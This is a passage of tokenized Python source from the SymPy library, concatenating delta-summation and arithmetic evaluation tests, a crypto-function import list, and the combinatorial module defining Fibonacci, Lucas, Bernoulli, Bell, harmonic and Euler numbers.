<= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_add_mul_x_y_mul_x_kd ( ) : <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:3> * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:1> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:2> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:3> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( k * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * x * y , True ) ) <EOL> assert ds ( x 
* y + x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( ( <NUM_LIT:4> - k ) * x * y + x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( ( <NUM_LIT:4> - k ) * x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * x * y + x , And ( k <= i , i <= l ) ) , ( ( l - k + <NUM_LIT:1> ) * x * y , True ) ) <EOL> def test_deltasummation_mul_x_add_y_kd ( ) : <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:3> * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:1> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:2> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:3> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( k * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( ( <NUM_LIT:4> - k ) * x * y + x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( ( <NUM_LIT:4> - k ) * x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * x * y + x , And ( k <= i , i <= l ) ) , ( ( l - k + <NUM_LIT:1> ) * x * y , True ) ) <EOL> def test_deltasummation_mul_x_add_y_twokd ( ) : <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:3> * x * y + <NUM_LIT:2> * x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * x * y , True ) ) <EOL> assert ds ( x * ( y + 
<NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x * y + <NUM_LIT:2> * x , Eq ( i , <NUM_LIT:1> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x * y + <NUM_LIT:2> * x , Eq ( i , <NUM_LIT:2> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x * y + <NUM_LIT:2> * x , Eq ( i , <NUM_LIT:3> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( k * x * y + <NUM_LIT:2> * x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( <EOL> ( ( <NUM_LIT:4> - k ) * x * y + <NUM_LIT:2> * x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( ( <NUM_LIT:4> - k ) * x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * x * y + <NUM_LIT:2> * x , And ( k <= i , i <= l ) ) , ( ( l - k + <NUM_LIT:1> ) * x * y , True ) ) <EOL> def test_deltasummation_mul_add_x_y_add_y_kd ( ) : <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( <EOL> ( <NUM_LIT:3> * ( x + y ) * y + x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( ( x + y ) * y + x + y , Eq ( i , <NUM_LIT:1> ) ) , ( ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( ( x + y ) * y + x + y , Eq ( i , <NUM_LIT:2> ) ) , ( ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( ( x + y ) * y + x + y , Eq ( i , 
<NUM_LIT:3> ) ) , ( ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( <EOL> ( k * ( x + y ) * y + x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( <EOL> ( ( <NUM_LIT:4> - k ) * ( x + y ) * y + x + y , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( ( <NUM_LIT:4> - k ) * ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * ( x + y ) * y + x + y , And ( k <= i , i <= l ) ) , <EOL> ( ( l - k + <NUM_LIT:1> ) * ( x + y ) * y , True ) ) <EOL> def test_deltasummation_mul_add_x_kd_add_y_kd ( ) : <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> <NUM_LIT:3> * ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( 
<NUM_LIT:0> , True ) ) + <EOL> k * ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( <NUM_LIT:4> - k ) * ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( l - k + <NUM_LIT:1> ) * ( KD ( i , k ) + x ) * y ) </s>
<s> from sympy import Symbol , Function , exp , sqrt , Rational , I , cos , tan <EOL> from sympy . utilities . pytest import XFAIL <EOL> def test_add_eval ( ) : <EOL> a = Symbol ( "<STR_LIT:a>" ) <EOL> b = Symbol ( "<STR_LIT:b>" ) <EOL> c = Rational ( <NUM_LIT:1> ) <EOL> p = Rational ( <NUM_LIT:5> ) <EOL> assert a * b + c + p == a * b + <NUM_LIT:6> <EOL> assert c + a + p == a + <NUM_LIT:6> <EOL> assert c + a - p == a + ( - <NUM_LIT:4> ) <EOL> assert a + a == <NUM_LIT:2> * a <EOL> assert a + p + a == <NUM_LIT:2> * a + <NUM_LIT:5> <EOL> assert c + p == Rational ( <NUM_LIT:6> ) <EOL> assert b + a - b == a <EOL> def test_addmul_eval ( ) : <EOL> a = Symbol ( "<STR_LIT:a>" ) <EOL> b = Symbol ( "<STR_LIT:b>" ) <EOL> c = Rational ( <NUM_LIT:1> ) <EOL> p = Rational ( <NUM_LIT:5> ) <EOL> assert c + a + b * c + a - p == <NUM_LIT:2> * a + b + ( - <NUM_LIT:4> ) <EOL> assert a * <NUM_LIT:2> + p + a == a * <NUM_LIT:2> + <NUM_LIT:5> + a <EOL> assert a * <NUM_LIT:2> + p + a == <NUM_LIT:3> * a + <NUM_LIT:5> <EOL> assert a * <NUM_LIT:2> + a == <NUM_LIT:3> * a <EOL> def test_pow_eval ( ) : <EOL> assert sqrt ( - <NUM_LIT:1> ) == I <EOL> assert sqrt ( - <NUM_LIT:4> ) == <NUM_LIT:2> * I <EOL> assert sqrt ( <NUM_LIT:4> ) == <NUM_LIT:2> <EOL> assert ( <NUM_LIT:8> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:2> <EOL> assert ( - <NUM_LIT:8> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:2> * ( ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert sqrt ( - <NUM_LIT:2> ) == I * sqrt ( <NUM_LIT:2> ) <EOL> assert ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) != I <EOL> assert ( - <NUM_LIT:10> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) != I * ( ( <NUM_LIT:10> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert ( - <NUM_LIT:2> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:4> ) != ( <NUM_LIT:2> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:4> ) <EOL> assert <NUM_LIT:64> ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:4> <EOL> assert 
<NUM_LIT:64> ** Rational ( <NUM_LIT:2> , <NUM_LIT:3> ) == <NUM_LIT:16> <EOL> assert <NUM_LIT> / sqrt ( <NUM_LIT:64> ) == <NUM_LIT:3> <EOL> assert ( - <NUM_LIT> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:3> * ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> assert ( cos ( <NUM_LIT:2> ) / tan ( <NUM_LIT:2> ) ) ** <NUM_LIT:2> == ( cos ( <NUM_LIT:2> ) / tan ( <NUM_LIT:2> ) ) ** <NUM_LIT:2> <EOL> @ XFAIL <EOL> def test_pow_eval_X1 ( ) : <EOL> assert ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) + Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) * I * sqrt ( <NUM_LIT:3> ) <EOL> def test_mulpow_eval ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> assert sqrt ( <NUM_LIT:50> ) / ( sqrt ( <NUM_LIT:2> ) * x ) == <NUM_LIT:5> / x <EOL> assert sqrt ( <NUM_LIT> ) / sqrt ( <NUM_LIT:3> ) == <NUM_LIT:3> <EOL> def test_evalpow_bug ( ) : <EOL> x = Symbol ( "<STR_LIT:x>" ) <EOL> assert <NUM_LIT:1> / ( <NUM_LIT:1> / x ) == x <EOL> assert <NUM_LIT:1> / ( - <NUM_LIT:1> / x ) == - x <EOL> def test_symbol_expand ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> y = Symbol ( '<STR_LIT:y>' ) <EOL> f = x ** <NUM_LIT:4> * y ** <NUM_LIT:4> <EOL> assert f == x ** <NUM_LIT:4> * y ** <NUM_LIT:4> <EOL> assert f == f . expand ( ) <EOL> g = ( x * y ) ** <NUM_LIT:4> <EOL> assert g == f <EOL> assert g . expand ( ) == f <EOL> assert g . expand ( ) == g . expand ( ) . expand ( ) <EOL> def test_function ( ) : <EOL> f = Function ( '<STR_LIT:f>' ) <EOL> l , x = map ( Symbol , '<STR_LIT>' ) <EOL> assert exp ( l ( x ) ) * l ( x ) / exp ( l ( x ) ) == l ( x ) <EOL> assert exp ( f ( x ) ) * f ( x ) / exp ( f ( x ) ) == f ( x ) </s>
<s> from sympy . crypto . crypto import ( cycle_list , <EOL> encipher_shift , encipher_affine , encipher_substitution , <EOL> check_and_join , encipher_vigenere , decipher_vigenere , bifid5_square , <EOL> bifid6_square , encipher_hill , decipher_hill , <EOL> encipher_bifid5 , encipher_bifid6 , decipher_bifid5 , <EOL> decipher_bifid6 , encipher_kid_rsa , decipher_kid_rsa , <EOL> kid_rsa_private_key , kid_rsa_public_key , decipher_rsa , rsa_private_key , <EOL> rsa_public_key , encipher_rsa , lfsr_connection_polynomial , <EOL> lfsr_autocorrelation , lfsr_sequence , encode_morse , decode_morse , <EOL> elgamal_private_key , elgamal_public_key , decipher_elgamal , <EOL> encipher_elgamal , dh_private_key , dh_public_key , dh_shared_key , <EOL> padded_key , encipher_bifid , decipher_bifid , bifid_square , bifid5 , <EOL> bifid6 , bifid10 ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import S , Symbol , Rational , Integer , Add , Dummy <EOL> from sympy . core . compatibility import as_int , SYMPY_INTS , range <EOL> from sympy . core . cache import cacheit <EOL> from sympy . core . function import Function , expand_mul <EOL> from sympy . core . numbers import E , pi <EOL> from sympy . core . relational import LessThan , StrictGreaterThan <EOL> from sympy . functions . combinatorial . factorials import binomial , factorial <EOL> from sympy . functions . elementary . exponential import log <EOL> from sympy . functions . elementary . integers import floor <EOL> from sympy . functions . elementary . trigonometric import sin , cos , cot <EOL> from sympy . functions . elementary . miscellaneous import sqrt <EOL> from sympy . utilities . memoization import recurrence_memo <EOL> from mpmath import bernfrac , workprec <EOL> from mpmath . libmp import ifib as _ifib <EOL> def _product ( a , b ) : <EOL> p = <NUM_LIT:1> <EOL> for k in range ( a , b + <NUM_LIT:1> ) : <EOL> p *= k <EOL> return p <EOL> _sym = Symbol ( '<STR_LIT:x>' ) <EOL> _symbols = Function ( '<STR_LIT:x>' ) <EOL> class fibonacci ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ staticmethod <EOL> def _fib ( n ) : <EOL> return _ifib ( n ) <EOL> @ staticmethod <EOL> @ recurrence_memo ( [ None , S . One , _sym ] ) <EOL> def _fibpoly ( n , prev ) : <EOL> return ( prev [ - <NUM_LIT:2> ] + _sym * prev [ - <NUM_LIT:1> ] ) . expand ( ) <EOL> @ classmethod <EOL> def eval ( cls , n , sym = None ) : <EOL> if n is S . Infinity : <EOL> return S . Infinity <EOL> if n . is_Integer : <EOL> n = int ( n ) <EOL> if n < <NUM_LIT:0> : <EOL> return S . NegativeOne ** ( n + <NUM_LIT:1> ) * fibonacci ( - n ) <EOL> if sym is None : <EOL> return Integer ( cls . _fib ( n ) ) <EOL> else : <EOL> if n < <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return cls . _fibpoly ( n ) . 
subs ( _sym , sym ) <EOL> def _eval_rewrite_as_sqrt ( self , n ) : <EOL> return <NUM_LIT:2> ** ( - n ) * sqrt ( <NUM_LIT:5> ) * ( ( <NUM_LIT:1> + sqrt ( <NUM_LIT:5> ) ) ** n - ( - sqrt ( <NUM_LIT:5> ) + <NUM_LIT:1> ) ** n ) / <NUM_LIT:5> <EOL> class lucas ( Function ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , n ) : <EOL> if n is S . Infinity : <EOL> return S . Infinity <EOL> if n . is_Integer : <EOL> return fibonacci ( n + <NUM_LIT:1> ) + fibonacci ( n - <NUM_LIT:1> ) <EOL> def _eval_rewrite_as_sqrt ( self , n ) : <EOL> return <NUM_LIT:2> ** ( - n ) * ( ( <NUM_LIT:1> + sqrt ( <NUM_LIT:5> ) ) ** n + ( - sqrt ( <NUM_LIT:5> ) + <NUM_LIT:1> ) ** n ) <EOL> class bernoulli ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ staticmethod <EOL> def _calc_bernoulli ( n ) : <EOL> s = <NUM_LIT:0> <EOL> a = int ( binomial ( n + <NUM_LIT:3> , n - <NUM_LIT:6> ) ) <EOL> for j in range ( <NUM_LIT:1> , n // <NUM_LIT:6> + <NUM_LIT:1> ) : <EOL> s += a * bernoulli ( n - <NUM_LIT:6> * j ) <EOL> a *= _product ( n - <NUM_LIT:6> - <NUM_LIT:6> * j + <NUM_LIT:1> , n - <NUM_LIT:6> * j ) <EOL> a //= _product ( <NUM_LIT:6> * j + <NUM_LIT:4> , <NUM_LIT:6> * j + <NUM_LIT:9> ) <EOL> if n % <NUM_LIT:6> == <NUM_LIT:4> : <EOL> s = - Rational ( n + <NUM_LIT:3> , <NUM_LIT:6> ) - s <EOL> else : <EOL> s = Rational ( n + <NUM_LIT:3> , <NUM_LIT:3> ) - s <EOL> return s / binomial ( n + <NUM_LIT:3> , n ) <EOL> _cache = { <NUM_LIT:0> : S . One , <NUM_LIT:2> : Rational ( <NUM_LIT:1> , <NUM_LIT:6> ) , <NUM_LIT:4> : Rational ( - <NUM_LIT:1> , <NUM_LIT:30> ) } <EOL> _highest = { <NUM_LIT:0> : <NUM_LIT:0> , <NUM_LIT:2> : <NUM_LIT:2> , <NUM_LIT:4> : <NUM_LIT:4> } <EOL> @ classmethod <EOL> def eval ( cls , n , sym = None ) : <EOL> if n . is_Number : <EOL> if n . is_Integer and n . is_nonnegative : <EOL> if n is S . Zero : <EOL> return S . One <EOL> elif n is S . One : <EOL> if sym is None : <EOL> return - S . Half <EOL> else : <EOL> return sym - S . Half <EOL> elif sym is None : <EOL> if n . 
is_odd : <EOL> return S . Zero <EOL> n = int ( n ) <EOL> if n > <NUM_LIT> : <EOL> p , q = bernfrac ( n ) <EOL> return Rational ( int ( p ) , int ( q ) ) <EOL> case = n % <NUM_LIT:6> <EOL> highest_cached = cls . _highest [ case ] <EOL> if n <= highest_cached : <EOL> return cls . _cache [ n ] <EOL> for i in range ( highest_cached + <NUM_LIT:6> , n + <NUM_LIT:6> , <NUM_LIT:6> ) : <EOL> b = cls . _calc_bernoulli ( i ) <EOL> cls . _cache [ i ] = b <EOL> cls . _highest [ case ] = i <EOL> return b <EOL> else : <EOL> n , result = int ( n ) , [ ] <EOL> for k in range ( n + <NUM_LIT:1> ) : <EOL> result . append ( binomial ( n , k ) * cls ( k ) * sym ** ( n - k ) ) <EOL> return Add ( * result ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if sym is None : <EOL> if n . is_odd and ( n - <NUM_LIT:1> ) . is_positive : <EOL> return S . Zero <EOL> class bell ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ staticmethod <EOL> @ recurrence_memo ( [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> def _bell ( n , prev ) : <EOL> s = <NUM_LIT:1> <EOL> a = <NUM_LIT:1> <EOL> for k in range ( <NUM_LIT:1> , n ) : <EOL> a = a * ( n - k ) // k <EOL> s += a * prev [ k ] <EOL> return s <EOL> @ staticmethod <EOL> @ recurrence_memo ( [ S . One , _sym ] ) <EOL> def _bell_poly ( n , prev ) : <EOL> s = <NUM_LIT:1> <EOL> a = <NUM_LIT:1> <EOL> for k in range ( <NUM_LIT:2> , n + <NUM_LIT:1> ) : <EOL> a = a * ( n - k + <NUM_LIT:1> ) // ( k - <NUM_LIT:1> ) <EOL> s += a * prev [ k - <NUM_LIT:1> ] <EOL> return expand_mul ( _sym * s ) <EOL> @ staticmethod <EOL> def _bell_incomplete_poly ( n , k , symbols ) : <EOL> r"""<STR_LIT>""" <EOL> if ( n == <NUM_LIT:0> ) and ( k == <NUM_LIT:0> ) : <EOL> return S . One <EOL> elif ( n == <NUM_LIT:0> ) or ( k == <NUM_LIT:0> ) : <EOL> return S . Zero <EOL> s = S . Zero <EOL> a = S . One <EOL> for m in range ( <NUM_LIT:1> , n - k + <NUM_LIT:2> ) : <EOL> s += a * bell . 
_bell_incomplete_poly ( <EOL> n - m , k - <NUM_LIT:1> , symbols ) * symbols [ m - <NUM_LIT:1> ] <EOL> a = a * ( n - m ) / m <EOL> return expand_mul ( s ) <EOL> @ classmethod <EOL> def eval ( cls , n , k_sym = None , symbols = None ) : <EOL> if n . is_Integer and n . is_nonnegative : <EOL> if k_sym is None : <EOL> return Integer ( cls . _bell ( int ( n ) ) ) <EOL> elif symbols is None : <EOL> return cls . _bell_poly ( int ( n ) ) . subs ( _sym , k_sym ) <EOL> else : <EOL> r = cls . _bell_incomplete_poly ( int ( n ) , int ( k_sym ) , symbols ) <EOL> return r <EOL> def _eval_rewrite_as_Sum ( self , n , k_sym = None , symbols = None ) : <EOL> from sympy import Sum <EOL> if ( k_sym is not None ) or ( symbols is not None ) : <EOL> return self <EOL> if not n . is_nonnegative : <EOL> return self <EOL> k = Dummy ( '<STR_LIT:k>' , integer = True , nonnegative = True ) <EOL> return <NUM_LIT:1> / E * Sum ( k ** n / factorial ( k ) , ( k , <NUM_LIT:0> , S . Infinity ) ) <EOL> class harmonic ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> _functions = { } <EOL> @ classmethod <EOL> def eval ( cls , n , m = None ) : <EOL> from sympy import zeta <EOL> if m is S . One : <EOL> return cls ( n ) <EOL> if m is None : <EOL> m = S . One <EOL> if m . is_zero : <EOL> return n <EOL> if n is S . Infinity and m . is_Number : <EOL> if m . is_negative : <EOL> return S . NaN <EOL> elif LessThan ( m , S . One ) : <EOL> return S . Infinity <EOL> elif StrictGreaterThan ( m , S . One ) : <EOL> return zeta ( m ) <EOL> else : <EOL> return cls <EOL> if n . is_Integer and n . is_nonnegative and m . is_Integer : <EOL> if n == <NUM_LIT:0> : <EOL> return S . Zero <EOL> if not m in cls . _functions : <EOL> @ recurrence_memo ( [ <NUM_LIT:0> ] ) <EOL> def f ( n , prev ) : <EOL> return prev [ - <NUM_LIT:1> ] + S . One / n ** m <EOL> cls . _functions [ m ] = f <EOL> return cls . _functions [ m ] ( int ( n ) ) <EOL> def _eval_rewrite_as_polygamma ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy . functions . 
special . gamma_functions import polygamma <EOL> return S . NegativeOne ** m / factorial ( m - <NUM_LIT:1> ) * ( polygamma ( m - <NUM_LIT:1> , <NUM_LIT:1> ) - polygamma ( m - <NUM_LIT:1> , n + <NUM_LIT:1> ) ) <EOL> def _eval_rewrite_as_digamma ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy . functions . special . gamma_functions import polygamma <EOL> return self . rewrite ( polygamma ) <EOL> def _eval_rewrite_as_trigamma ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy . functions . special . gamma_functions import polygamma <EOL> return self . rewrite ( polygamma ) <EOL> def _eval_rewrite_as_Sum ( self , n , m = None ) : <EOL> from sympy import Sum <EOL> k = Dummy ( "<STR_LIT:k>" , integer = True ) <EOL> if m is None : <EOL> m = S . One <EOL> return Sum ( k ** ( - m ) , ( k , <NUM_LIT:1> , n ) ) <EOL> def _eval_expand_func ( self , ** hints ) : <EOL> from sympy import Sum <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> m = self . args [ <NUM_LIT:1> ] if len ( self . args ) == <NUM_LIT:2> else <NUM_LIT:1> <EOL> if m == S . One : <EOL> if n . is_Add : <EOL> off = n . args [ <NUM_LIT:0> ] <EOL> nnew = n - off <EOL> if off . is_Integer and off . is_positive : <EOL> result = [ S . One / ( nnew + i ) for i in range ( off , <NUM_LIT:0> , - <NUM_LIT:1> ) ] + [ harmonic ( nnew ) ] <EOL> return Add ( * result ) <EOL> elif off . is_Integer and off . is_negative : <EOL> result = [ - S . One / ( nnew + i ) for i in range ( <NUM_LIT:0> , off , - <NUM_LIT:1> ) ] + [ harmonic ( nnew ) ] <EOL> return Add ( * result ) <EOL> if n . is_Rational : <EOL> p , q = n . as_numer_denom ( ) <EOL> u = p // q <EOL> p = p - u * q <EOL> if u . is_nonnegative and p . is_positive and q . 
is_positive and p < q : <EOL> k = Dummy ( "<STR_LIT:k>" ) <EOL> t1 = q * Sum ( <NUM_LIT:1> / ( q * k + p ) , ( k , <NUM_LIT:0> , u ) ) <EOL> t2 = <NUM_LIT:2> * Sum ( cos ( ( <NUM_LIT:2> * pi * p * k ) / S ( q ) ) * <EOL> log ( sin ( ( pi * k ) / S ( q ) ) ) , <EOL> ( k , <NUM_LIT:1> , floor ( ( q - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) ) ) <EOL> t3 = ( pi / <NUM_LIT:2> ) * cot ( ( pi * p ) / q ) + log ( <NUM_LIT:2> * q ) <EOL> return t1 + t2 - t3 <EOL> return self <EOL> def _eval_rewrite_as_tractable ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy import polygamma <EOL> return self . rewrite ( polygamma ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> def _eval_evalf ( self , prec ) : <EOL> from sympy import polygamma <EOL> if all ( i . is_number for i in self . args ) : <EOL> return self . rewrite ( polygamma ) . _eval_evalf ( prec ) <EOL> class euler ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , m ) : <EOL> if m . is_odd : <EOL> return S . Zero <EOL> if m . is_Integer and m . is_nonnegative : <EOL> from mpmath import mp <EOL> m = m . _to_mpmath ( mp . prec ) <EOL> res = mp . eulernum ( m , exact = True ) <EOL> return Integer ( res ) <EOL> def _eval_rewrite_as_Sum ( self , arg ) : <EOL> from sympy import Sum <EOL> if arg . is_even : <EOL> k = Dummy ( "<STR_LIT:k>" , integer = True ) <EOL> j = Dummy ( "<STR_LIT>" , integer = True ) <EOL> n = self . args [ <NUM_LIT:0> ] / <NUM_LIT:2> <EOL> Em = ( S . ImaginaryUnit * Sum ( Sum ( binomial ( k , j ) * 